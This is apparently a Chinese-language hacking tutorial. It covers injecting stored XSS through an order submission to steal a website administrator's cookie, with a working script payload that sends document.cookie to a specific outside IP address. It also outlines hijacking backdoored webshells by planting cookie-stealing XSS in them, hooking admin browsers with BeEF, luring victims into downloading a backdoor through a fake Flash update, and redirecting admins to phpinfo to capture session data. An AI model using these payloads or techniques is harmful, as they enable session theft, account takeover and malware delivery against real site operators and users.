订单cookie窃取和shell箱子反杀
通过提交订单的方式植入xss来获取网站管理员cookie
简单测试
窃取cookie
https://www.postman.com/downloads/下载postman
本地构造实现xss攻击1
本地服务器端39.96.44.170 文件jieshou.php
<script>
new Image().src =
"http://39.96.44.170/jieshou.php?c=" + encodeURI(document.cookie);
</script>
方法2
本地加载js脚本
webshell沙箱反杀
就是使用别人的webshell来进行获取服务器shell,但获取shell后webshell存在的恶意代码就会把网站信息和webshell密码,和用户名发到webshell的原主人来进行信息收集,通过大量获取的网站shell来进行贩卖,而使用webshell的人就成打工仔了
反杀的意思就是像上面的窃取cookie道理一样通过向webshell的代码中插入窃取cookie的代码,当webshell 原注入查看沙箱时就会触发xss窃取cookie来达到反客为主!
webshell 中的恶意代码
把网站信息发送到指定地址
成功发送到沙箱
反杀操作
webshell中的恶意代码
通过访问webshll来植入xss代码窃取cookie
殊不知cooKie已被窃取
登录沙箱后台
演示存在后门的大马
通过打开webshell进行抓包测试发现向恶意网站发送信息
发送的代码
内容为网站地址和webshell密码
beef结合xss攻击
启动beef
后台管理员查看订单触发xss
成功上线
社工攻击(利用flash更新)
利用模拟flash更新向客户端发送请求,来实现下载后门
客户端显示
点击就下载后门
获取session思路
因为当访问php探针时就会携带session
如果能利用xss让管理员页面跳转到phpinfo()页面,通过返回页面源码就能窃取session
利用beef进行页面跳转
获取页面源码
获取源码中的cookie和session